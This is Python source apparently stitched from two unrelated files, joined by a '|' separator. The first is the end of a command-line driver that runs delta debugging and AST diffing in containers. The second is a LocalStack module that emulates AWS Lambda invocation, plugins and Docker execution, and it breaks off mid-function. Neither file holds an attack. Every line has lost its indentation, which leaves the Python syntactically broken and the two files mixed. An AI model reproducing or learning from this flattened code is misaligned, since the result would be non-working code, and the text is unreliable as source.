if os.path.exists(work_dir):
print('You are about to overwrite "{}".'.format(work_dir))
while True:
a = input('Do you want to proceed (y/n)? ')
if a == 'y':
break
elif a == 'n':
return
else:
ensure_dir(work_dir)
cca_proj_dir = CCA_VAR+'/project'
cca_cmd = '{}/ddutil/{}.py'.format(CCA_HOME, engine)
cca_cmd += ' {} {} {}'.format(cca_proj_dir, v_good, v_bad)
cca_cmd += ' --build-script {} --test-script {}'.format(build_script, test_script)
cca_cmd += ' --proj-id {}'.format(proj_id)
if include:
cca_cmd += ''.join([' --include {}'.format(i) for i in include])
if lang:
cca_cmd += ''.join([' --lang {}'.format(i) for i in lang])
cca_cmd += ' -a {}'.format(algo)
if shuffle:
cca_cmd += ' --shuffle'
if greedy:
cca_cmd += ' --greedy'
if staged:
cca_cmd += ' --staged'
if debug:
cca_cmd += ' -d'
elif verbose:
cca_cmd += ' -v'
if kwargs.get('custom_split', False):
cca_cmd += ' --custom-split'
max_stmt_level = kwargs.get('max_stmt_level', None)
modified_stmt_rate_thresh = kwargs.get('modified_stmt_rate_thresh', None)
mem = kwargs.get('mem', None)
if max_stmt_level != None:
cca_cmd += ' --max-stmt-level {}'.format(max_stmt_level)
if modified_stmt_rate_thresh != None:
cca_cmd += ' --modified-stmt-rate-thresh {}'.format(modified_stmt_rate_thresh)
if mem != None:
cca_cmd += ' --mem {}'.format(mem)
cca_cmd = '/bin/bash -c "(time {}) >& {}/{}.log"'.format(cca_cmd, CCA_VAR, engine)
run_cmd = '{} run --rm -t'.format(container_cmd)
vol_opt = ' -v "{}:{}"'.format(proj_dir, cca_proj_dir)
vol_opt += ' -v "{}:{}"'.format(work_dir, CCA_VAR)
installer_path = os.path.join(proj_dir, DEPENDENCIES_INSTALLER)
if os.path.exists(installer_path):
vol_opt += ' -v "{}:{}"'.format(installer_path, cca_proj_dir+'/'+DEPENDENCIES_INSTALLER)
if TZ:
run_cmd += ' -e "TZ={}"'.format(TZ)
run_cmd += vol_opt
run_cmd += ' {} {}'.format(get_image_name(image, devel=devel), cca_cmd)
stat_path = os.path.join(work_dir, STAT_NAME)
if verbose:
print(run_cmd)
if not dry_run:
if os.path.exists(stat_path):
#print('Removing "{}"...'.format(stat_path))
os.remove(stat_path)
try:
proc = Popen(run_cmd, bufsize=BUFSIZE, shell=True, universal_newlines=True)
th = Thread(target=progress, args=(proc, stat_path))
th.start()
th.join()
except (KeyboardInterrupt, SystemExit):
print('Interrupted.')
except OSError as e:
print('Execution failed: {}'.format(e))
def run_ddplain(container_cmd, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], lang=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=True, debug=False):
run_dd(container_cmd, 'ddp', proj_dir, v_good, v_bad, build_script=build_script, test_script=test_script,
proj_id=proj_id, include=include, lang=lang, algo=algo,
shuffle=shuffle, greedy=greedy, staged=staged,
dry_run=dry_run, devel=devel, image=image, verbose=verbose, debug=debug)
def run_ddjava(container_cmd, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
custom_split=False, max_stmt_level=8,
modified_stmt_rate_thresh=0.05, mem=8,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=False, debug=False):
run_dd(container_cmd, 'ddj', proj_dir, v_good, v_bad, build_script=build_script, test_script=test_script,
proj_id=proj_id, include=include, lang=[], algo=algo,
shuffle=shuffle, greedy=greedy, staged=staged,
custom_split=custom_split, max_stmt_level=max_stmt_level,
modified_stmt_rate_thresh=modified_stmt_rate_thresh, mem=mem,
dry_run=dry_run, devel=devel, image=image, verbose=verbose, debug=debug)
def update(args):
cmd = '{} pull {}'.format(args.container_cmd, get_image_name(args.image, devel=args.devel))
if args.verbose or args.dry_run:
print(cmd)
if not args.dry_run:
try:
run(cmd, shell=True)
except OSError as e:
print('Execution failed: {}'.format(e))
def diffast(args):
run_diffast(args.container_cmd,
args.original, args.modified, cache=args.cache, clear_cache=args.force, view=args.view,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def ddplain(args):
run_ddplain(args.container_cmd,
args.proj_dir, args.v_good, args.v_bad, args.build_script, args.test_script,
proj_id=args.proj_id, include=args.include, lang=args.lang, algo=args.algo,
shuffle=args.shuffle, greedy=args.greedy, staged=args.staged,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def ddjava(args):
run_ddjava(args.container_cmd,
args.proj_dir, args.v_good, args.v_bad, args.build_script, args.test_script,
proj_id=args.proj_id, include=args.include, algo=args.algo,
shuffle=args.shuffle, greedy=args.greedy, staged=args.staged,
custom_split=args.custom_split, max_stmt_level=args.max_stmt_level,
modified_stmt_rate_thresh=args.modified_stmt_rate_thresh, mem=args.mem,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def main():
parser = ArgumentParser(description='A CCA driver',
add_help=False,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--dry-run', dest='dry_run', action='store_true',
help='only print container commands')
parser.add_argument('--container-command', dest='container_cmd', metavar='CMD',
help='specify container command', default=CONTAINER_CMD)
parser.add_argument('-i', '--image', dest='image', type=str, metavar='IMAGE', default=IMAGE_NAME,
help='specify container image')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='enable verbose printing')
parser.add_argument('-d', '--debug', dest='debug', action='store_true',
help='enable debug printing')
parser.add_argument('-x', '--experimental', dest='devel', action='store_true',
help='use experimental image')
p = ArgumentParser(add_help=True)
subparsers = p.add_subparsers(title='subcommands')
# Docker image update
parser_update = subparsers.add_parser('update',
description='Update docker image of CCA',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_update.set_defaults(func=update)
# Diff/AST
parser_diffast = subparsers.add_parser('diffast',
description='Compare two programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_diffast.add_argument('original', type=str, metavar='ORIGINAL', help='original source file')
parser_diffast.add_argument('modified', type=str, metavar='MODIFIED', help='modified source file')
parser_diffast.add_argument('--view', dest='view', action='store_true',
help='launch DiffViewer after comparison')
parser_diffast.add_argument('-f', '--force', dest='force', action='store_true',
help='force comparison (overwrite cache)')
parser_diffast.add_argument('-c', '--cache', dest='cache', default=DEFAULT_CACHE_DIR,
metavar='DIR', type=str, help='result cache directory')
parser_diffast.set_defaults(func=diffast)
# DDP
parser_ddp = subparsers.add_parser('ddplain',
description='Delta debugging on changes of (plain text) programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_ddp.add_argument('proj_dir', type=str, help='project directory')
parser_ddp.add_argument('v_good', type=str, help='id of good version (proj_dir/v_good)')
parser_ddp.add_argument('v_bad', type=str, help='id of bad version (proj_dir/v_bad)')
parser_ddp.add_argument('--build-script', type=str, default='build.sh',
help='specify build script at proj_dir/v_good/')
parser_ddp.add_argument('--test-script', type=str, default='test.sh',
help='specify script at proj_dir/v_good/ that returns test result (PASS|FAIL|UNRESOLVED)')
parser_ddp.add_argument('--proj-id', type=str, metavar='PROJ_ID', default=None,
help='project id (dirname of PROJ_DIR is used by default)')
parser_ddp.add_argument('--include', type=str, metavar='DIR', action='append', default=[],
help='analyze only sub-directories (relative paths)')
parser_ddp.add_argument('--lang', type=str, metavar='LANG', action='append', choices=['java', 'python'],
help='specify languages {%(choices)s}')
parser_ddp.add_argument('-a', '--algo', dest='algo', choices=['ddmin', 'dd'],
help='specify DD algorithm', default='ddmin')
parser_ddp.add_argument('--shuffle', dest='shuffle', type=int, metavar='N', default=0,
help='shuffle delta components N times')
parser_ddp.add_argument('--greedy', dest='greedy', action='store_true',
help='try to find multiple solutions')
parser_ddp.add_argument('--staged', dest='staged', action='store_true',
help='enable staging')
parser_ddp.set_defaults(func=ddplain)
# DDJ
parser_ddj = subparsers.add_parser('ddjava',
description='Delta debugging on changes of Java programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_ddj.add_argument('proj_dir', type=str, help='project directory')
parser_ddj.add_argument('v_good', type=str, help='id of good version (proj_dir/v_good)')
parser_ddj.add_argument('v_bad', type=str, help='id of bad version (proj_dir/v_bad)')
parser_ddj.add_argument('--build-script', type=str, default='build.sh',
help='specify build script at proj_dir/v_good/')
parser_ddj.add_argument('--test-script', type=str, default='test.sh',
help='specify script at proj_dir/v_good/ that returns test result (PASS|FAIL|UNRESOLVED)')
parser_ddj.add_argument('--proj_id', type=str, metavar='PROJ_ID', default=None,
help='specify project id (dirname of PROJ_DIR is used by default)')
parser_ddj.add_argument('--include', type=str, metavar='DIR', action='append', default=[],
help='analyze only sub-directories (relative paths)')
parser_ddj.add_argument('-a', '--algo', dest='algo', choices=['ddmin', 'dd'],
help='specify DD algorithm', default='ddmin')
parser_ddj.add_argument('--shuffle', dest='shuffle', type=int, metavar='N', default=0,
help='shuffle delta components N times')
parser_ddj.add_argument('--greedy', dest='greedy', action='store_true',
help='try to find multiple solutions')
parser_ddj.add_argument('--staged', dest='staged', action='store_true',
help='enable staging')
parser_ddj.add_argument('--custom-split', dest='custom_split', action='store_true',
help='enable custom split')
parser_ddj.add_argument('--max-stmt-level', dest='max_stmt_level', default=8,
metavar='N', type=int, help='grouping statements at levels up to N')
parser_ddj.add_argument('--modified-stmt-rate-thresh', dest='modified_stmt_rate_thresh',
default=0.05, metavar='R', type=float,
help='suppress level 1+ statement grouping when modified statement rate is less than R')
parser_ddj.add_argument('-m', '--mem', dest='mem', metavar='GB', type=int,
choices=[2, 4, 8, 16, 32, 48, 64], default=8,
help='set available memory (GB) for container')
parser_ddj.set_defaults(func=ddjava)
#
args = p.parse_args()
try:
args.func(args)
except:
#raise
p.print_help()
if __name__ == '__main__':
main()
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.constants import DEFAULT_LAMBDA_CONTAINER_REGISTRY
from localstack.services.awslambda.lambda_utils import (
API_PATH_ROOT,
LAMBDA_RUNTIME_PROVIDED,
get_main_endpoint_from_container,
get_record_from_event,
is_java_lambda,
is_nodejs_runtime,
rm_docker_container,
store_lambda_logs,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
is_port_open,
json_safe,
last_index_of,
long_uid,
md5,
now,
retry,
run,
run_safe,
safe_requests,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
wait_for_port_open,
)
from localstack.utils.docker_utils import (
DOCKER_CLIENT,
ContainerException,
DockerContainerStatus,
PortMappings,
)
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.dirs.tmp
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
# port number used in lambci images for stay-open invocation mode
STAY_OPEN_API_PORT = 9001
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output=None, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, str]
context: LambdaContext
invocation_type: str # "Event" or "RequestResponse"
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
invocation_type=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
self.invocation_type = invocation_type
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
"""Return additional invocation options for given Lambda invocation context. Optionally, an
InvocationResult can be returned, in which case the result is returned to the client right away."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
class LambdaInvocationForwarderPlugin(LambdaExecutorPlugin):
"""Plugin that forwards Lambda invocations to external targets defined in LAMBDA_FORWARD_URL"""
def should_apply(self, context: InvocationContext) -> bool:
"""If LAMBDA_FORWARD_URL is configured, forward the invocation of this Lambda to the target URL."""
func_forward_url = self._forward_url(context)
return bool(func_forward_url)
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
forward_url = self._forward_url(context)
result = self._forward_to_url(
forward_url,
context.lambda_function,
context.event,
context.context,
context.invocation_type,
)
return result
def _forward_to_url(
self,
forward_url: str,
lambda_function: LambdaFunction,
event: Union[Dict, bytes],
context: LambdaContext,
invocation_type: str,
) -> InvocationResult:
func_name = lambda_function.name()
url = "%s%s/functions/%s/invocations" % (forward_url, API_PATH_ROOT, func_name)
copied_env_vars = lambda_function.envvars.copy()
copied_env_vars["LOCALSTACK_HOSTNAME"] = config.HOSTNAME_EXTERNAL
copied_env_vars["LOCALSTACK_EDGE_PORT"] = str(config.EDGE_PORT)
headers = aws_stack.mock_aws_request_headers("lambda")
headers["X-Amz-Region"] = lambda_function.region()
headers["X-Amz-Request-Id"] = context.aws_request_id
headers["X-Amz-Handler"] = lambda_function.handler
headers["X-Amz-Function-ARN"] = context.invoked_function_arn
headers["X-Amz-Function-Name"] = context.function_name
headers["X-Amz-Function-Version"] = context.function_version
headers["X-Amz-Role"] = lambda_function.role
headers["X-Amz-Runtime"] = lambda_function.runtime
headers["X-Amz-Timeout"] = str(lambda_function.timeout)
headers["X-Amz-Memory-Size"] = str(context.memory_limit_in_mb)
headers["X-Amz-Log-Group-Name"] = context.log_group_name
headers["X-Amz-Log-Stream-Name"] = context.log_stream_name
headers["X-Amz-Env-Vars"] = json.dumps(copied_env_vars)
headers["X-Amz-Last-Modified"] = str(int(lambda_function.last_modified.timestamp() * 1000))
headers["X-Amz-Invocation-Type"] = invocation_type
headers["X-Amz-Log-Type"] = "Tail"
if context.client_context:
headers["X-Amz-Client-Context"] = context.client_context
if context.cognito_identity:
headers["X-Amz-Cognito-Identity"] = context.cognito_identity
data = run_safe(lambda: to_str(event)) or event
data = json.dumps(json_safe(data)) if isinstance(data, dict) else str(data)
LOG.debug(
"Forwarding Lambda invocation to LAMBDA_FORWARD_URL: %s" % config.LAMBDA_FORWARD_URL
)
result = safe_requests.post(url, data, headers=headers)
if result.status_code >= 400:
raise Exception(
"Received error status code %s from external Lambda invocation" % result.status_code
)
content = run_safe(lambda: to_str(result.content)) or result.content
LOG.debug(
"Received result from external Lambda endpoint (status %s): %s"
% (result.status_code, content)
)
result = InvocationResult(content)
return result
def _forward_url(self, context: InvocationContext) -> str:
env_vars = context.lambda_function.envvars
return env_vars.get("LOCALSTACK_LAMBDA_FORWARD_URL") or config.LAMBDA_FORWARD_URL
def handle_error(
lambda_function: LambdaFunction, event: Dict, error: Exception, asynchronous: bool = False
):
if asynchronous:
if get_record_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_record_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
return sqs_error_to_dead_letter_queue(sqs_queue_arn, event, error)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, error)
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
# note: leave here to avoid circular import issues
from localstack.utils.aws.message_forwarding import lambda_result_to_destination
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
invocation_type = "Event" if asynchronous else "RequestResponse"
inv_context = InvocationContext(
lambda_function,
event=event,
function_version=version,
context=context,
invocation_type=invocation_type,
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
dlq_sent = handle_error(lambda_function, event, e, asynchronous)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext) -> Optional[InvocationResult]:
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
invocation_results = []
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
if isinstance(inv_options, InvocationResult):
invocation_results.append(inv_options)
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
if invocation_results:
# TODO: This is currently indeterministic! If multiple execution plugins attempt to return
# an invocation result right away, only the first one is returned. We need a more solid
# mechanism for conflict resolution if multiple plugins interfere!
if len(invocation_results) > 1:
LOG.warning(
"Multiple invocation results returned from "
"LambdaExecutorPlugin.prepare_invocation calls - choosing the first one: %s",
invocation_results,
)
return invocation_results[0]
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
if config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = (
f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags or ''}".strip()
)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
except InvocationException as e:
result = e.result or ""
log_output = e.log_output or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
store_lambda_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"' % lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
